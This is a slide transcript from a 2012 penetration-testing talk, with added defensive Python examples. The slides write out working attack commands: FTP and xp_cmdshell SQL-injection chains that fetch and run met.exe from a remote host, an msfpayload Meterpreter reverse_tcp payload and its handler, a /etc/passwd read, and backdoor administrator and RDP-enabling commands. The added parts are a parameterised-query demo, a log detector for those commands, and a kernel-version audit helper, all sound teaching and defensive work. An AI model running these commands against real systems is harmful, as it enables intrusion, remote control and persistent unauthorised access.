  • 9. Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
  • 10. Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
  • 11. Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
• 12. Nmap Scripts
  /usr/local/share/nmap/scripts
• 13. Nmap Scripts
  • Shared files and folders
    • nmap --script=smb-enum-shares 192.168.80.129
  • Check for SMB vulnerabilities
    • nmap --script=smb-check-vulns 192.168.80.129
  • Scan for machines that use the default MS SQL username and password
    • nmap --script=ms-sql-info 192.168.80.129
• 14. Scanning
  I have Nessus. Why go through so much pain?
  I don’t have Nessus. What to do?
• 15. Exploit
   Motive
    To gain access
    Data
    Command execution
    Destroy everything!
   Categories
    Service level
    OS
• 16. Exploit
  What to exploit?
    FTP?
    HTTP?
    SNMP?
    What else?
• 17. Exploit
   FTP
    Server Exploit – Buffer Overflow
    Fuzzing???
    Bruteforce
   SNMP
    What to do?
• 18. FTP Tips
  Windows (the two "echo ftp" lines supply the anonymous username and password)
    echo open 192.168.12.124 > ftp.txt
    echo ftp>> ftp.txt
    echo ftp>> ftp.txt
    echo bin >> ftp.txt
    echo get met2.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -s:ftp.txt
• 19. FTP Tips
  Linux
    echo quote user ftp >> ftp.txt
    echo quote pass ftp >> ftp.txt
    echo verbose >> ftp.txt
    echo binary >> ftp.txt
    echo get exploit.c >> ftp.txt
    echo bye >> ftp.txt
    cat ftp.txt | ftp -n 192.168.12.124
• 20. Exploit
   HTTP
    Server Exploit
    Command Execution
    Web Shells
    SQLi
• 21. HTTP
• 22. SQLi Tips
  MS SQL Server (stacked queries through xp_cmdshell)
    ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye>> ftpmet.txt';exec master..xp_cmdshell 'ftp -s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';--
• 23. SQLi Tips
  MySQL non-interactive
    mysql --host=127.0.0.1 --user=root --password='password' -e "use mysql; show tables;"
    mysql --host=127.0.0.1 --user=root --password='password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';"
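Both SQLi slides start from the same root cause: user input concatenated into SQL text, so a single quote in the input ends the string literal and the `or 1=1` tautology that opens the slide 22 payload is evaluated as SQL. The example below is added for this page and is not the speaker's code; it uses an in-memory SQLite table (constructed data) to show the injectable query beside its parameterised form. SQLite's `execute()` refuses stacked statements, so the `;exec master..xp_cmdshell` chain from the slide cannot be reproduced here; that part is specific to SQL Server drivers that accept multiple statements.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table (sample data, not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, name, password):
    """The injectable pattern slide 22 relies on: input is pasted straight into
    the SQL text, so a quote in the input terminates the string literal."""
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, name, password):
    """Parameterised query: the values travel separately from the SQL text and
    are never parsed as SQL, whatever characters they contain."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, password)))


# The tautology prefix of the slide 22 payload; the closing "--" comments out
# the quote that the application appends after the value.
INJECTION = "' OR 1=1 --"


def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, "nobody", INJECTION),  # every user
        "safe": login_safe(conn, "nobody", INJECTION),              # no user
        "legit": login_safe(conn, "alice", "s3cret"),               # alice only
    }


if __name__ == "__main__":
    for label, names in demo().items():
        print(f"{label}: {names}")
```

In the vulnerable version the WHERE clause becomes `name = 'nobody' AND password = '' OR 1=1 --'`, which is true for every row, so the login "succeeds" as both users; the parameterised version returns nothing for the same input and still works for real credentials. On SQL Server the second half of the slide's payload only works because the application account is a sysadmin and `xp_cmdshell` is enabled; running the application under a low-privilege login and leaving `xp_cmdshell` off (`EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;`) removes that stage even where an injection remains.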
• 24. Exploit
   Metasploit
    Use Exploit
    Set payload
    exploit
   Any other options?
  How about writing your own exploit (in your free time)? (out of scope)
• 25. L33t love story
   Exploit’s love letter to the machine
   PAYLOAD… Which courier?
    MSF – set payload
    Custom program – msfpayload
    Bad characters
    Executable – msfpayload
• 26. Payload Generator
   meterpreter
  msfpayload options:
    ./msfpayload windows/meterpreter/reverse_tcp O
  Create exe:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe
  Generate shellcode:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C
• 27. From msf:
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.40
    set LPORT 80
    show options
    exploit
• 28. Exploit
  I am in, what to do?
   Secure access?
    Add user
    Open a port
    I like it the reverse way
    meterpreter
   Dude, did you get root/admin access?
• 29. Add User
   Windows Shell
    net user hacker hacker123 /add
    net localgroup administrators hacker /add
   Meterpreter
    use incognito
    add_user hacker hacker123
    add_localgroup_user Administrators hacker
   RDP enable
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
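Every post-exploitation step on slides 18, 22 and 29 runs through a command line that a process-creation log (Sysmon event 1, Windows event 4688 with command-line auditing) records: `ftp -s:` driven by a script file, `net user ... /add`, `net localgroup administrators ... /add`, and a `reg add` flipping `fDenyTSConnections` to 0, plus a shell whose parent is `sqlservr.exe` when the chain comes through `xp_cmdshell`. The detector below is an added example for this page, not the speaker's code: it scans constructed tab-separated records (timestamp, host, user, parent image, command line; the record layout and the rule names are assumptions) and reports which of those patterns each line triggers.

```python
import re

# Constructed process-creation records (sample data, not from the slides), tab-separated:
# timestamp, host, user, parent image, command line.
SAMPLE_LOG = "\n".join([
    "2012-08-24T13:05:01\tWS01\tWS01\\svcweb\texplorer.exe\tcmd.exe /c echo open 192.168.12.124 > ftp.txt",
    "2012-08-24T13:05:02\tWS01\tWS01\\svcweb\tcmd.exe\tftp -s:ftp.txt",
    "2012-08-24T13:05:30\tWS01\tWS01\\svcweb\tcmd.exe\tnet user hacker hacker123 /add",
    "2012-08-24T13:05:31\tWS01\tWS01\\svcweb\tcmd.exe\tnet localgroup administrators hacker /add",
    "2012-08-24T13:05:40\tWS01\tWS01\\svcweb\tcmd.exe\t"
    "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\""
    " /v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "2012-08-24T13:06:00\tDB01\tNT SERVICE\\MSSQLSERVER\tsqlservr.exe\tcmd.exe /c ftp -s:ftpmet.txt",
    "2012-08-24T14:00:00\tWS02\tCORP\\alice\texplorer.exe\tftp files.corp.example",
    "2012-08-24T14:00:05\tWS02\tCORP\\alice\tcmd.exe\tnet user",
])

# (rule name, regex matched case-insensitively against the command line)
COMMAND_RULES = [
    ("scripted_ftp", r"\bftp(?:\.exe)?\s+-s:"),
    ("local_user_add", r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"),
    ("admin_group_add", r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("rdp_enabled_via_registry",
     r"\breg(?:\.exe)?\s+add\b.*terminal server.*fdenytsconnections.*/d\s+0\b"),
]
COMPILED_RULES = [(name, re.compile(pattern, re.IGNORECASE)) for name, pattern in COMMAND_RULES]

# Parents that should not normally spawn a shell: the process tree xp_cmdshell leaves behind.
SUSPICIOUS_PARENTS = {"sqlservr.exe"}


def parse_record(line):
    ts, host, user, parent, cmdline = line.split("\t", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmdline": cmdline}


def evaluate(record):
    """Return the names of every rule the record triggers (empty list if none)."""
    names = [name for name, rx in COMPILED_RULES if rx.search(record["cmdline"])]
    if record["parent"].lower() in SUSPICIOUS_PARENTS:
        names.append("shell_spawned_by_sql_server")
    return names


def scan_log(text):
    """Map 1-based line number -> triggered rule names, for flagged lines only."""
    hits = {}
    for number, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        names = evaluate(parse_record(line))
        if names:
            hits[number] = names
    return hits


if __name__ == "__main__":
    for number, names in scan_log(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(names)}")
```

Lines 2 to 6 of the sample are flagged and the interactive `ftp` session and the plain `net user` listing on lines 7 and 8 are not. The `net1?` alternative matters because `net1.exe` accepts the same arguments as `net.exe`; the parent-process rule catches the slide 22 chain even when the command line itself is innocuous, and in practice that single rule (a shell under `sqlservr.exe`) is worth more than any command-line regex.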
• 30. Privilege Escalation
   Categories
    Service level
    OS
  Problem!
   How can I transfer my exploit there?
    Netcat
    FTP
• 31. Kernel Exploits
   Linux Kernel <= 2.6.36-rc8 http://www.exploit-db.com/exploits/15285/
   Linux Kernel 2.4/2.6 http://www.exploit-db.com/exploits/9545/
   Linux Kernel 2.6 http://www.exploit-db.com/exploits/8478/
   Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/
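From the defender's side the list on slide 31 is a patch-audit question: does the kernel a host reports (the `uname -r` string) fall inside one of the stated ranges? The comparison is not a plain string compare, because `2.6.36-rc8` precedes `2.6.36` and distribution kernels carry suffixes such as `-5-amd64`. The helper below is an added example for this page, not the speaker's code; it encodes only the ranges the slide states explicitly (the two entries that give just a series, "2.4/2.6" and "2.6", are too broad to encode and are left out), and the version strings it is exercised with are constructed.

```python
import re

# Ranges exactly as stated on slide 31, paired with the slide's exploit-db URLs.
AFFECTED_RANGES = [
    ("http://www.exploit-db.com/exploits/15285/", None, "2.6.36-rc8"),
    ("http://www.exploit-db.com/exploits/9844/", "2.4.1", "2.4.37"),
    ("http://www.exploit-db.com/exploits/9844/", "2.6.1", "2.6.32-rc5"),
]

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?")


def parse_kernel_version(text):
    """'2.6.32-rc5' -> (2, 6, 32, 5); '2.6.32-5-amd64' -> (2, 6, 32, inf).
    A final release sorts after every rc of the same number; whatever follows
    the version (distro build suffixes) is ignored."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a kernel version: {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch or 0), int(rc) if rc else float("inf"))


def affected_by(version_text):
    """Return the slide's exploit-db URLs whose stated range contains this version."""
    v = parse_kernel_version(version_text)
    urls = []
    for url, low, high in AFFECTED_RANGES:
        if low is not None and v < parse_kernel_version(low):
            continue
        if v > parse_kernel_version(high):
            continue
        if url not in urls:
            urls.append(url)
    return urls


if __name__ == "__main__":
    # constructed uname -r strings, not hosts from the talk
    for sample in ["2.6.32-rc5", "2.6.32-5-amd64", "2.6.36", "3.2.0-4-amd64"]:
        print(sample, "->", affected_by(sample) or "outside the listed ranges")
```

A hit is a prompt, not a verdict: distributions backport fixes without changing the version number, so a kernel inside a listed range must still be checked against the vendor's advisory for that package, while a kernel outside every range is simply not covered by these four entries.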
• 32. Windows Exploits
   Windows Vista, 7, 2008 http://www.exploit-db.com/exploits/15609/
   Windows XP, 2003 http://www.exploit-db.com/exploits/18176/
   Linux + NT priv esc http://www.exploit-db.com/exploits/9301/
   Windows XP SP2, SP3 http://www.exploit-db.com/exploits/9301/
• 33. Pivoting…
   Huh? Why do I need it? How do I do it?
   nc + port forwarding
   SSH tunneling
• 34. Fuzzing…
   My favorite, but the last thing I prefer to do on my own
   Python rocks!
   Basic
   Advanced
    SEH handler
    Egg hunting shellcode
• 35. Did I miss anything?
   Questions
   Perspectives
   Comments
  tamaghna.basu@gmail.com
  twitter.com/titanlambda
  linkedin.com/in/tamaghnabasu
• 36. Thank you
  tamaghna.basu@gmail.com
  twitter.com/titanlambda
  linkedin.com/in/tamaghnabasu